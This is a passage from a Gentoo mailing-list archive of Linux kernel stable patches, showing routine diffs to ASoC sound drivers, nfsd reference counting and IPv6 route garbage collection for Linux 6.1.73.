+@@ -663,7 +663,7 @@ static struct da7219_aad_pdata *da7219_aad_fw_to_pdata(struct device *dev)
+ 		aad_pdata->mic_det_thr =
+ 			da7219_aad_fw_mic_det_thr(dev, fw_val32);
+ 	else
+-		aad_pdata->mic_det_thr = DA7219_AAD_MIC_DET_THR_500_OHMS;
++		aad_pdata->mic_det_thr = DA7219_AAD_MIC_DET_THR_200_OHMS;
+ 
+ 	if (fwnode_property_read_u32(aad_np, "dlg,jack-ins-deb", &fw_val32) >= 0)
+ 		aad_pdata->jack_ins_deb =
+diff --git a/sound/soc/codecs/hdac_hda.c b/sound/soc/codecs/hdac_hda.c
+index 8af434e14bfba..21a00c86a1398 100644
+--- a/sound/soc/codecs/hdac_hda.c
++++ b/sound/soc/codecs/hdac_hda.c
+@@ -124,6 +124,9 @@ static struct snd_soc_dai_driver hdac_hda_dais[] = {
+ 		.sig_bits = 24,
+ 	},
+ },
++};
++
++static struct snd_soc_dai_driver hdac_hda_hdmi_dais[] = {
+ {
+ 	.id = HDAC_HDMI_0_DAI_ID,
+ 	.name = "intel-hdmi-hifi1",
+@@ -578,8 +581,16 @@ static const struct snd_soc_component_driver hdac_hda_codec = {
+ 	.endianness		= 1,
+ };
+ 
++static const struct snd_soc_component_driver hdac_hda_hdmi_codec = {
++	.probe			= hdac_hda_codec_probe,
++	.remove			= hdac_hda_codec_remove,
++	.idle_bias_on		= false,
++	.endianness		= 1,
++};
++
+ static int hdac_hda_dev_probe(struct hdac_device *hdev)
+ {
++	struct hdac_hda_priv *hda_pvt = dev_get_drvdata(&hdev->dev);
+ 	struct hdac_ext_link *hlink;
+ 	int ret;
+ 
+@@ -592,9 +603,15 @@ static int hdac_hda_dev_probe(struct hdac_device *hdev)
+ 	snd_hdac_ext_bus_link_get(hdev->bus, hlink);
+ 
+ 	/* ASoC specific initialization */
+-	ret = devm_snd_soc_register_component(&hdev->dev,
+-					 &hdac_hda_codec, hdac_hda_dais,
+-					 ARRAY_SIZE(hdac_hda_dais));
++	if (hda_pvt->need_display_power)
++		ret = devm_snd_soc_register_component(&hdev->dev,
++						&hdac_hda_hdmi_codec, hdac_hda_hdmi_dais,
++						ARRAY_SIZE(hdac_hda_hdmi_dais));
++	else
++		ret = devm_snd_soc_register_component(&hdev->dev,
++						&hdac_hda_codec, hdac_hda_dais,
++						ARRAY_SIZE(hdac_hda_dais));
++
+ 	if (ret < 0) {
+ 		dev_err(&hdev->dev, "failed to register HDA codec %d\n", ret);
+ 		return ret;
+diff --git a/sound/soc/codecs/nau8822.c b/sound/soc/codecs/nau8822.c
+index 1aef281a99727..cd5053cfd5213 100644
+--- a/sound/soc/codecs/nau8822.c
++++ b/sound/soc/codecs/nau8822.c
+@@ -184,6 +184,7 @@ static int nau8822_eq_get(struct snd_kcontrol *kcontrol,
+ 	struct soc_bytes_ext *params = (void *)kcontrol->private_value;
+ 	int i, reg;
+ 	u16 reg_val, *val;
++	__be16 tmp;
+ 
+ 	val = (u16 *)ucontrol->value.bytes.data;
+ 	reg = NAU8822_REG_EQ1;
+@@ -192,8 +193,8 @@ static int nau8822_eq_get(struct snd_kcontrol *kcontrol,
+ 		/* conversion of 16-bit integers between native CPU format
+ 		 * and big endian format
+ 		 */
+-		reg_val = cpu_to_be16(reg_val);
+-		memcpy(val + i, &reg_val, sizeof(reg_val));
++		tmp = cpu_to_be16(reg_val);
++		memcpy(val + i, &tmp, sizeof(tmp));
+ 	}
+ 
+ 	return 0;
+@@ -216,6 +217,7 @@ static int nau8822_eq_put(struct snd_kcontrol *kcontrol,
+ 	void *data;
+ 	u16 *val, value;
+ 	int i, reg, ret;
++	__be16 *tmp;
+ 
+ 	data = kmemdup(ucontrol->value.bytes.data,
+ 		params->max, GFP_KERNEL | GFP_DMA);
+@@ -228,7 +230,8 @@ static int nau8822_eq_put(struct snd_kcontrol *kcontrol,
+ 		/* conversion of 16-bit integers between native CPU format
+ 		 * and big endian format
+ 		 */
+-		value = be16_to_cpu(*(val + i));
++		tmp = (__be16 *)(val + i);
++		value = be16_to_cpup(tmp);
+ 		ret = snd_soc_component_write(component, reg + i, value);
+ 		if (ret) {
+ 			dev_err(component->dev,
+diff --git a/sound/soc/codecs/rt5645.c b/sound/soc/codecs/rt5645.c
+index f86fc7cd104d4..60518ee5a86e7 100644
+--- a/sound/soc/codecs/rt5645.c
++++ b/sound/soc/codecs/rt5645.c
+@@ -448,6 +448,7 @@ struct rt5645_priv {
+ 	struct regulator_bulk_data supplies[ARRAY_SIZE(rt5645_supply_names)];
+ 	struct rt5645_eq_param_s *eq_param;
+ 	struct timer_list btn_check_timer;
++	struct mutex jd_mutex;
+ 
+ 	int codec_type;
+ 	int sysclk;
+@@ -3189,6 +3190,8 @@ static int rt5645_jack_detect(struct snd_soc_component *component, int jack_inse
+ 				rt5645_enable_push_button_irq(component, true);
+ 			}
+ 		} else {
++			if (rt5645->en_button_func)
++				rt5645_enable_push_button_irq(component, false);
+ 			snd_soc_dapm_disable_pin(dapm, "Mic Det Power");
+ 			snd_soc_dapm_sync(dapm);
+ 			rt5645->jack_type = SND_JACK_HEADPHONE;
+@@ -3269,6 +3272,8 @@ static void rt5645_jack_detect_work(struct work_struct *work)
+ 	if (!rt5645->component)
+ 		return;
+ 
++	mutex_lock(&rt5645->jd_mutex);
++
+ 	switch (rt5645->pdata.jd_mode) {
+ 	case 0: /* Not using rt5645 JD */
+ 		if (rt5645->gpiod_hp_det) {
+@@ -3295,7 +3300,7 @@ static void rt5645_jack_detect_work(struct work_struct *work)
+ 
+ 	if (!val && (rt5645->jack_type == 0)) { /* jack in */
+ 		report = rt5645_jack_detect(rt5645->component, 1);
+-	} else if (!val && rt5645->jack_type != 0) {
++	} else if (!val && rt5645->jack_type == SND_JACK_HEADSET) {
+ 		/* for push button and jack out */
+ 		btn_type = 0;
+ 		if (snd_soc_component_read(rt5645->component, RT5645_INT_IRQ_ST) & 0x4) {
+@@ -3351,6 +3356,8 @@ static void rt5645_jack_detect_work(struct work_struct *work)
+ 		rt5645_jack_detect(rt5645->component, 0);
+ 	}
+ 
++	mutex_unlock(&rt5645->jd_mutex);
++
+ 	snd_soc_jack_report(rt5645->hp_jack, report, SND_JACK_HEADPHONE);
+ 	snd_soc_jack_report(rt5645->mic_jack, report, SND_JACK_MICROPHONE);
+ 	if (rt5645->en_button_func)
+@@ -4119,6 +4126,7 @@ static int rt5645_i2c_probe(struct i2c_client *i2c)
+ 	}
+ 	timer_setup(&rt5645->btn_check_timer, rt5645_btn_check_callback, 0);
+ 
++	mutex_init(&rt5645->jd_mutex);
+ 	INIT_DELAYED_WORK(&rt5645->jack_detect_work, rt5645_jack_detect_work);
+ 	INIT_DELAYED_WORK(&rt5645->rcclock_work, rt5645_rcclock_work);
+ 
+diff --git a/sound/soc/codecs/wm8974.c b/sound/soc/codecs/wm8974.c
+index 010a394c705c1..1becbf2c6ffad 100644
+--- a/sound/soc/codecs/wm8974.c
++++ b/sound/soc/codecs/wm8974.c
+@@ -186,7 +186,7 @@ SOC_DAPM_SINGLE("PCM Playback Switch", WM8974_MONOMIX, 0, 1, 0),
+ 
+ /* Boost mixer */
+ static const struct snd_kcontrol_new wm8974_boost_mixer[] = {
+-SOC_DAPM_SINGLE("Aux Switch", WM8974_INPPGA, 6, 1, 1),
++SOC_DAPM_SINGLE("PGA Switch", WM8974_INPPGA, 6, 1, 1),
+ };
+ 
+ /* Input PGA */
+@@ -246,8 +246,8 @@ static const struct snd_soc_dapm_route wm8974_dapm_routes[] = {
+ 
+ 	/* Boost Mixer */
+ 	{"ADC", NULL, "Boost Mixer"},
+-	{"Boost Mixer", "Aux Switch", "Aux Input"},
+-	{"Boost Mixer", NULL, "Input PGA"},
++	{"Boost Mixer", NULL, "Aux Input"},
++	{"Boost Mixer", "PGA Switch", "Input PGA"},
+ 	{"Boost Mixer", NULL, "MICP"},
+ 
+ 	/* Input PGA */
+diff --git a/sound/soc/intel/boards/bytcr_rt5640.c b/sound/soc/intel/boards/bytcr_rt5640.c
+index 783c201259921..797d0a48d6066 100644
+--- a/sound/soc/intel/boards/bytcr_rt5640.c
++++ b/sound/soc/intel/boards/bytcr_rt5640.c
+@@ -83,6 +83,7 @@ enum {
+ #define BYT_RT5640_HSMIC2_ON_IN1	BIT(27)
+ #define BYT_RT5640_JD_HP_ELITEP_1000G2	BIT(28)
+ #define BYT_RT5640_USE_AMCR0F28		BIT(29)
++#define BYT_RT5640_SWAPPED_SPEAKERS	BIT(30)
+ 
+ #define BYTCR_INPUT_DEFAULTS				\
+ 	(BYT_RT5640_IN3_MAP |				\
+@@ -157,6 +158,8 @@ static void log_quirks(struct device *dev)
+ 		dev_info(dev, "quirk MONO_SPEAKER enabled\n");
+ 	if (byt_rt5640_quirk & BYT_RT5640_NO_SPEAKERS)
+ 		dev_info(dev, "quirk NO_SPEAKERS enabled\n");
++	if (byt_rt5640_quirk & BYT_RT5640_SWAPPED_SPEAKERS)
++		dev_info(dev, "quirk SWAPPED_SPEAKERS enabled\n");
+ 	if (byt_rt5640_quirk & BYT_RT5640_LINEOUT)
+ 		dev_info(dev, "quirk LINEOUT enabled\n");
+ 	if (byt_rt5640_quirk & BYT_RT5640_LINEOUT_AS_HP2)
+@@ -884,6 +887,19 @@ static const struct dmi_system_id byt_rt5640_quirk_table[] = {
+ 					BYT_RT5640_SSP0_AIF1 |
+ 					BYT_RT5640_MCLK_EN),
+ 	},
++	{
++		/* Medion Lifetab S10346 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "AMI Corporation"),
++			DMI_MATCH(DMI_BOARD_NAME, "Aptio CRB"),
++			/* Above strings are much too generic, also match on BIOS date */
++			DMI_MATCH(DMI_BIOS_DATE, "10/22/2015"),
++		},
++		.driver_data = (void *)(BYTCR_INPUT_DEFAULTS |
++					BYT_RT5640_SWAPPED_SPEAKERS |
++					BYT_RT5640_SSP0_AIF1 |
++					BYT_RT5640_MCLK_EN),
++	},
+ 	{	/* Mele PCG03 Mini PC */
+ 		.matches = {
+ 			DMI_EXACT_MATCH(DMI_BOARD_VENDOR, "Mini PC"),
+@@ -1609,11 +1625,11 @@ static int snd_byt_rt5640_mc_probe(struct platform_device *pdev)
+ 	const char *platform_name;
+ 	struct acpi_device *adev;
+ 	struct device *codec_dev;
++	const char *cfg_spk;
+ 	bool sof_parent;
+ 	int ret_val = 0;
+ 	int dai_index = 0;
+-	int i, cfg_spk;
+-	int aif;
++	int i, aif;
+ 
+ 	is_bytcr = false;
+ 	priv = devm_kzalloc(dev, sizeof(*priv), GFP_KERNEL);
+@@ -1773,13 +1789,16 @@ static int snd_byt_rt5640_mc_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	if (byt_rt5640_quirk & BYT_RT5640_NO_SPEAKERS) {
+-		cfg_spk = 0;
++		cfg_spk = "0";
+ 		spk_type = "none";
+ 	} else if (byt_rt5640_quirk & BYT_RT5640_MONO_SPEAKER) {
+-		cfg_spk = 1;
++		cfg_spk = "1";
+ 		spk_type = "mono";
++	} else if (byt_rt5640_quirk & BYT_RT5640_SWAPPED_SPEAKERS) {
++		cfg_spk = "swapped";
++		spk_type = "swapped";
+ 	} else {
+-		cfg_spk = 2;
++		cfg_spk = "2";
+ 		spk_type = "stereo";
+ 	}
+ 
+@@ -1794,7 +1813,7 @@ static int snd_byt_rt5640_mc_probe(struct platform_device *pdev)
+ 		headset2_string = " cfg-hs2:in1";
+ 
+ 	snprintf(byt_rt5640_components, sizeof(byt_rt5640_components),
+-		 "cfg-spk:%d cfg-mic:%s aif:%d%s%s", cfg_spk,
++		 "cfg-spk:%s cfg-mic:%s aif:%d%s%s", cfg_spk,
+ 		 map_name[BYT_RT5640_MAP(byt_rt5640_quirk)], aif,
+ 		 lineout_string, headset2_string);
+ 	byt_rt5640_card.components = byt_rt5640_components;
+diff --git a/sound/soc/intel/boards/skl_hda_dsp_generic.c b/sound/soc/intel/boards/skl_hda_dsp_generic.c
+index 879ebba528322..463ffb85121d3 100644
+--- a/sound/soc/intel/boards/skl_hda_dsp_generic.c
++++ b/sound/soc/intel/boards/skl_hda_dsp_generic.c
+@@ -157,6 +157,8 @@ static int skl_hda_fill_card_info(struct snd_soc_acpi_mach_params *mach_params)
+ 		card->dapm_widgets = skl_hda_widgets;
+ 		card->num_dapm_widgets = ARRAY_SIZE(skl_hda_widgets);
+ 		if (!ctx->idisp_codec) {
++			card->dapm_routes = &skl_hda_map[IDISP_ROUTE_COUNT];
++			num_route -= IDISP_ROUTE_COUNT;
+ 			for (i = 0; i < IDISP_DAI_COUNT; i++) {
+ 				skl_hda_be_dai_links[i].codecs = dummy_codec;
+ 				skl_hda_be_dai_links[i].num_codecs =
+diff --git a/sound/soc/intel/skylake/skl-pcm.c b/sound/soc/intel/skylake/skl-pcm.c
+index 1015716f93361..adee4be2dea71 100644
+--- a/sound/soc/intel/skylake/skl-pcm.c
++++ b/sound/soc/intel/skylake/skl-pcm.c
+@@ -251,8 +251,10 @@ static int skl_pcm_open(struct snd_pcm_substream *substream,
+ 	snd_pcm_set_sync(substream);
+ 
+ 	mconfig = skl_tplg_fe_get_cpr_module(dai, substream->stream);
+-	if (!mconfig)
++	if (!mconfig) {
++		kfree(dma_params);
+ 		return -EINVAL;
++	}
+ 
+ 	skl_tplg_d0i3_get(skl, mconfig->d0i3_caps);
+ 
+@@ -1471,6 +1473,7 @@ int skl_platform_register(struct device *dev)
+ 		dais = krealloc(skl->dais, sizeof(skl_fe_dai) +
+ 				sizeof(skl_platform_dai), GFP_KERNEL);
+ 		if (!dais) {
++			kfree(skl->dais);
+ 			ret = -ENOMEM;
+ 			goto err;
+ 		}
+@@ -1483,8 +1486,10 @@ int skl_platform_register(struct device *dev)
+ 
+ 	ret = devm_snd_soc_register_component(dev, &skl_component,
+ 					 skl->dais, num_dais);
+-	if (ret)
++	if (ret) {
++		kfree(skl->dais);
+ 		dev_err(dev, "soc component registration failed %d\n", ret);
++	}
+ err:
+ 	return ret;
+ }
+diff --git a/sound/soc/intel/skylake/skl-sst-ipc.c b/sound/soc/intel/skylake/skl-sst-ipc.c
+index 7a425271b08b1..fd9624ad5f72b 100644
+--- a/sound/soc/intel/skylake/skl-sst-ipc.c
++++ b/sound/soc/intel/skylake/skl-sst-ipc.c
+@@ -1003,8 +1003,10 @@ int skl_ipc_get_large_config(struct sst_generic_ipc *ipc,
+ 
+ 	reply.size = (reply.header >> 32) & IPC_DATA_OFFSET_SZ_MASK;
+ 	buf = krealloc(reply.data, reply.size, GFP_KERNEL);
+-	if (!buf)
++	if (!buf) {
++		kfree(reply.data);
+ 		return -ENOMEM;
++	}
+ 	*payload = buf;
+ 	*bytes = reply.size;
+ 
+diff --git a/sound/soc/soc-ops.c b/sound/soc/soc-ops.c
+index 55b009d3c6815..2d25748ca7066 100644
+--- a/sound/soc/soc-ops.c
++++ b/sound/soc/soc-ops.c
+@@ -661,7 +661,7 @@ int snd_soc_limit_volume(struct snd_soc_card *card,
+ 	kctl = snd_soc_card_get_kcontrol(card, name);
+ 	if (kctl) {
+ 		struct soc_mixer_control *mc = (struct soc_mixer_control *)kctl->private_value;
+-		if (max <= mc->max) {
++		if (max <= mc->max - mc->min) {
+ 			mc->platform_max = max;
+ 			ret = 0;
+ 		}
+diff --git a/sound/soc/sof/intel/hda-codec.c b/sound/soc/sof/intel/hda-codec.c
+index f2ec2a6c2e0f3..a0dfd7de431fe 100644
+--- a/sound/soc/sof/intel/hda-codec.c
++++ b/sound/soc/sof/intel/hda-codec.c
+@@ -54,8 +54,16 @@ static int request_codec_module(struct hda_codec *codec)
+ 
+ static int hda_codec_load_module(struct hda_codec *codec)
+ {
+-	int ret = request_codec_module(codec);
++	int ret;
++
++	ret = snd_hdac_device_register(&codec->core);
++	if (ret) {
++		dev_err(&codec->core.dev, "failed to register hdac device\n");
++		put_device(&codec->core.dev);
++		return ret;
++	}
+ 
++	ret = request_codec_module(codec);
+ 	if (ret <= 0) {
+ 		codec->probe_id = HDA_CODEC_ID_GENERIC;
+ 		ret = request_codec_module(codec);
+@@ -112,7 +120,6 @@ EXPORT_SYMBOL_NS(hda_codec_jack_check, SND_SOC_SOF_HDA_AUDIO_CODEC);
+ static struct hda_codec *hda_codec_device_init(struct hdac_bus *bus, int addr, int type)
+ {
+ 	struct hda_codec *codec;
+-	int ret;
+ 
+ 	codec = snd_hda_codec_device_init(to_hda_bus(bus), addr, "ehdaudio%dD%d", bus->idx, addr);
+ 	if (IS_ERR(codec)) {
+@@ -122,13 +129,6 @@ static struct hda_codec *hda_codec_device_init(struct hdac_bus *bus, int addr, i
+ 
+ 	codec->core.type = type;
+ 
+-	ret = snd_hdac_device_register(&codec->core);
+-	if (ret) {
+-		dev_err(bus->dev, "failed to register hdac device\n");
+-		put_device(&codec->core.dev);
+-		return ERR_PTR(ret);
+-	}
+-
+ 	return codec;
+ }
+ 
+diff --git a/tools/testing/selftests/alsa/mixer-test.c b/tools/testing/selftests/alsa/mixer-test.c
+index a38b89c280306..37da902545a41 100644
+--- a/tools/testing/selftests/alsa/mixer-test.c
++++ b/tools/testing/selftests/alsa/mixer-test.c
+@@ -177,7 +177,7 @@ static void find_controls(void)
+ 			err = snd_ctl_elem_info(card_data->handle,
+ 						ctl_data->info);
+ 			if (err < 0) {
+-				ksft_print_msg("%s getting info for %d\n",
++				ksft_print_msg("%s getting info for %s\n",
+ 					       snd_strerror(err),
+ 					       ctl_data->name);
+ 			}


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-01-15 18:47 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-01-15 18:47 UTC (permalink / raw
  To: gentoo-commits

commit:     148d2179613dff642ecf5cb7253eee922ab3cb1e
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Jan 15 18:47:24 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Jan 15 18:47:24 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=148d2179

Linux patch 6.1.73

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 +
 1072_linux-6.1.73.patch | 294 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 298 insertions(+)

diff --git a/0000_README b/0000_README
index fd657319..9cb280cd 100644
--- a/0000_README
+++ b/0000_README
@@ -331,6 +331,10 @@ Patch:  1071_linux-6.1.72.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.72
 
+Patch:  1072_linux-6.1.73.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.73
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1072_linux-6.1.73.patch b/1072_linux-6.1.73.patch
new file mode 100644
index 00000000..feadcd41
--- /dev/null
+++ b/1072_linux-6.1.73.patch
@@ -0,0 +1,294 @@
+diff --git a/Makefile b/Makefile
+index bad3387b3251c..e4f2d019ca745 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 72
++SUBLEVEL = 73
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/fs/nfsd/nfsctl.c b/fs/nfsd/nfsctl.c
+index b3b4542e31ed5..573de0d49e172 100644
+--- a/fs/nfsd/nfsctl.c
++++ b/fs/nfsd/nfsctl.c
+@@ -716,10 +716,8 @@ static ssize_t __write_ports_addfd(char *buf, struct net *net, const struct cred
+ 
+ 	err = svc_addsock(nn->nfsd_serv, net, fd, buf, SIMPLE_TRANSACTION_LIMIT, cred);
+ 
+-	if (err < 0 && !nn->nfsd_serv->sv_nrthreads && !nn->keep_active)
+-		nfsd_last_thread(net);
+-	else if (err >= 0 &&
+-		 !nn->nfsd_serv->sv_nrthreads && !xchg(&nn->keep_active, 1))
++	if (err >= 0 &&
++	    !nn->nfsd_serv->sv_nrthreads && !xchg(&nn->keep_active, 1))
+ 		svc_get(nn->nfsd_serv);
+ 
+ 	nfsd_put(net);
+@@ -769,9 +767,6 @@ out_close:
+ 		svc_xprt_put(xprt);
+ 	}
+ out_err:
+-	if (!nn->nfsd_serv->sv_nrthreads && !nn->keep_active)
+-		nfsd_last_thread(net);
+-
+ 	nfsd_put(net);
+ 	return err;
+ }
+diff --git a/fs/nfsd/nfsd.h b/fs/nfsd/nfsd.h
+index 53166cce7062c..09726c5b9a317 100644
+--- a/fs/nfsd/nfsd.h
++++ b/fs/nfsd/nfsd.h
+@@ -97,12 +97,7 @@ int		nfsd_pool_stats_open(struct inode *, struct file *);
+ int		nfsd_pool_stats_release(struct inode *, struct file *);
+ void		nfsd_shutdown_threads(struct net *net);
+ 
+-static inline void nfsd_put(struct net *net)
+-{
+-	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+-
+-	svc_put(nn->nfsd_serv);
+-}
++void		nfsd_put(struct net *net);
+ 
+ bool		i_am_nfsd(void);
+ 
+@@ -139,7 +134,6 @@ int nfsd_vers(struct nfsd_net *nn, int vers, enum vers_op change);
+ int nfsd_minorversion(struct nfsd_net *nn, u32 minorversion, enum vers_op change);
+ void nfsd_reset_versions(struct nfsd_net *nn);
+ int nfsd_create_serv(struct net *net);
+-void nfsd_last_thread(struct net *net);
+ 
+ extern int nfsd_max_blksize;
+ 
+diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
+index 350c6c72f793f..c7695ebd28dc3 100644
+--- a/fs/nfsd/nfssvc.c
++++ b/fs/nfsd/nfssvc.c
+@@ -523,14 +523,9 @@ static struct notifier_block nfsd_inet6addr_notifier = {
+ /* Only used under nfsd_mutex, so this atomic may be overkill: */
+ static atomic_t nfsd_notifier_refcount = ATOMIC_INIT(0);
+ 
+-void nfsd_last_thread(struct net *net)
++static void nfsd_last_thread(struct svc_serv *serv, struct net *net)
+ {
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+-	struct svc_serv *serv = nn->nfsd_serv;
+-
+-	spin_lock(&nfsd_notifier_lock);
+-	nn->nfsd_serv = NULL;
+-	spin_unlock(&nfsd_notifier_lock);
+ 
+ 	/* check if the notifier still has clients */
+ 	if (atomic_dec_return(&nfsd_notifier_refcount) == 0) {
+@@ -540,8 +535,6 @@ void nfsd_last_thread(struct net *net)
+ #endif
+ 	}
+ 
+-	svc_xprt_destroy_all(serv, net);
+-
+ 	/*
+ 	 * write_ports can create the server without actually starting
+ 	 * any threads--if we get shut down before any threads are
+@@ -632,8 +625,7 @@ void nfsd_shutdown_threads(struct net *net)
+ 	svc_get(serv);
+ 	/* Kill outstanding nfsd threads */
+ 	svc_set_num_threads(serv, NULL, 0);
+-	nfsd_last_thread(net);
+-	svc_put(serv);
++	nfsd_put(net);
+ 	mutex_unlock(&nfsd_mutex);
+ }
+ 
+@@ -663,6 +655,9 @@ int nfsd_create_serv(struct net *net)
+ 	serv->sv_maxconn = nn->max_connections;
+ 	error = svc_bind(serv, net);
+ 	if (error < 0) {
++		/* NOT nfsd_put() as notifiers (see below) haven't
++		 * been set up yet.
++		 */
+ 		svc_put(serv);
+ 		return error;
+ 	}
+@@ -705,6 +700,29 @@ int nfsd_get_nrthreads(int n, int *nthreads, struct net *net)
+ 	return 0;
+ }
+ 
++/* This is the callback for kref_put() below.
++ * There is no code here as the first thing to be done is
++ * call svc_shutdown_net(), but we cannot get the 'net' from
++ * the kref.  So do all the work when kref_put returns true.
++ */
++static void nfsd_noop(struct kref *ref)
++{
++}
++
++void nfsd_put(struct net *net)
++{
++	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
++
++	if (kref_put(&nn->nfsd_serv->sv_refcnt, nfsd_noop)) {
++		svc_xprt_destroy_all(nn->nfsd_serv, net);
++		nfsd_last_thread(nn->nfsd_serv, net);
++		svc_destroy(&nn->nfsd_serv->sv_refcnt);
++		spin_lock(&nfsd_notifier_lock);
++		nn->nfsd_serv = NULL;
++		spin_unlock(&nfsd_notifier_lock);
++	}
++}
++
+ int nfsd_set_nrthreads(int n, int *nthreads, struct net *net)
+ {
+ 	int i = 0;
+@@ -755,7 +773,7 @@ int nfsd_set_nrthreads(int n, int *nthreads, struct net *net)
+ 		if (err)
+ 			break;
+ 	}
+-	svc_put(nn->nfsd_serv);
++	nfsd_put(net);
+ 	return err;
+ }
+ 
+@@ -770,7 +788,6 @@ nfsd_svc(int nrservs, struct net *net, const struct cred *cred)
+ 	int	error;
+ 	bool	nfsd_up_before;
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+-	struct svc_serv *serv;
+ 
+ 	mutex_lock(&nfsd_mutex);
+ 	dprintk("nfsd: creating service\n");
+@@ -790,25 +807,22 @@ nfsd_svc(int nrservs, struct net *net, const struct cred *cred)
+ 		goto out;
+ 
+ 	nfsd_up_before = nn->nfsd_net_up;
+-	serv = nn->nfsd_serv;
+ 
+ 	error = nfsd_startup_net(net, cred);
+ 	if (error)
+ 		goto out_put;
+-	error = svc_set_num_threads(serv, NULL, nrservs);
++	error = svc_set_num_threads(nn->nfsd_serv, NULL, nrservs);
+ 	if (error)
+ 		goto out_shutdown;
+-	error = serv->sv_nrthreads;
+-	if (error == 0)
+-		nfsd_last_thread(net);
++	error = nn->nfsd_serv->sv_nrthreads;
+ out_shutdown:
+ 	if (error < 0 && !nfsd_up_before)
+ 		nfsd_shutdown_net(net);
+ out_put:
+ 	/* Threads now hold service active */
+ 	if (xchg(&nn->keep_active, 0))
+-		svc_put(serv);
+-	svc_put(serv);
++		nfsd_put(net);
++	nfsd_put(net);
+ out:
+ 	mutex_unlock(&nfsd_mutex);
+ 	return error;
+diff --git a/fs/smb/client/cifsfs.c b/fs/smb/client/cifsfs.c
+index 2e15b182e59fc..7286a56aebfa9 100644
+--- a/fs/smb/client/cifsfs.c
++++ b/fs/smb/client/cifsfs.c
+@@ -1240,7 +1240,7 @@ static int cifs_flush_folio(struct inode *inode, loff_t pos, loff_t *_fstart, lo
+ 	int rc = 0;
+ 
+ 	folio = filemap_get_folio(inode->i_mapping, index);
+-	if (IS_ERR(folio))
++	if (!folio)
+ 		return 0;
+ 
+ 	size = folio_size(folio);
+diff --git a/include/net/dst_ops.h b/include/net/dst_ops.h
+index 88ff7bb2bb9bd..632086b2f644a 100644
+--- a/include/net/dst_ops.h
++++ b/include/net/dst_ops.h
+@@ -16,7 +16,7 @@ struct dst_ops {
+ 	unsigned short		family;
+ 	unsigned int		gc_thresh;
+ 
+-	int			(*gc)(struct dst_ops *ops);
++	void			(*gc)(struct dst_ops *ops);
+ 	struct dst_entry *	(*check)(struct dst_entry *, __u32 cookie);
+ 	unsigned int		(*default_advmss)(const struct dst_entry *);
+ 	unsigned int		(*mtu)(const struct dst_entry *);
+diff --git a/net/core/dst.c b/net/core/dst.c
+index bc9c9be4e0801..d178c564138ee 100644
+--- a/net/core/dst.c
++++ b/net/core/dst.c
+@@ -82,12 +82,8 @@ void *dst_alloc(struct dst_ops *ops, struct net_device *dev,
+ 
+ 	if (ops->gc &&
+ 	    !(flags & DST_NOCOUNT) &&
+-	    dst_entries_get_fast(ops) > ops->gc_thresh) {
+-		if (ops->gc(ops)) {
+-			pr_notice_ratelimited("Route cache is full: consider increasing sysctl net.ipv6.route.max_size.\n");
+-			return NULL;
+-		}
+-	}
++	    dst_entries_get_fast(ops) > ops->gc_thresh)
++		ops->gc(ops);
+ 
+ 	dst = kmem_cache_alloc(ops->kmem_cachep, GFP_ATOMIC);
+ 	if (!dst)
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index 0bcdb675ba2c1..7f65dc750feb8 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -91,7 +91,7 @@ static struct dst_entry *ip6_negative_advice(struct dst_entry *);
+ static void		ip6_dst_destroy(struct dst_entry *);
+ static void		ip6_dst_ifdown(struct dst_entry *,
+ 				       struct net_device *dev, int how);
+-static int		 ip6_dst_gc(struct dst_ops *ops);
++static void		 ip6_dst_gc(struct dst_ops *ops);
+ 
+ static int		ip6_pkt_discard(struct sk_buff *skb);
+ static int		ip6_pkt_discard_out(struct net *net, struct sock *sk, struct sk_buff *skb);
+@@ -3288,11 +3288,10 @@ out:
+ 	return dst;
+ }
+ 
+-static int ip6_dst_gc(struct dst_ops *ops)
++static void ip6_dst_gc(struct dst_ops *ops)
+ {
+ 	struct net *net = container_of(ops, struct net, ipv6.ip6_dst_ops);
+ 	int rt_min_interval = net->ipv6.sysctl.ip6_rt_gc_min_interval;
+-	int rt_max_size = net->ipv6.sysctl.ip6_rt_max_size;
+ 	int rt_elasticity = net->ipv6.sysctl.ip6_rt_gc_elasticity;
+ 	int rt_gc_timeout = net->ipv6.sysctl.ip6_rt_gc_timeout;
+ 	unsigned long rt_last_gc = net->ipv6.ip6_rt_last_gc;
+@@ -3300,11 +3299,10 @@ static int ip6_dst_gc(struct dst_ops *ops)
+ 	int entries;
+ 
+ 	entries = dst_entries_get_fast(ops);
+-	if (entries > rt_max_size)
++	if (entries > ops->gc_thresh)
+ 		entries = dst_entries_get_slow(ops);
+ 
+-	if (time_after(rt_last_gc + rt_min_interval, jiffies) &&
+-	    entries <= rt_max_size)
++	if (time_after(rt_last_gc + rt_min_interval, jiffies))
+ 		goto out;
+ 
+ 	fib6_run_gc(atomic_inc_return(&net->ipv6.ip6_rt_gc_expire), net, true);
+@@ -3314,7 +3312,6 @@ static int ip6_dst_gc(struct dst_ops *ops)
+ out:
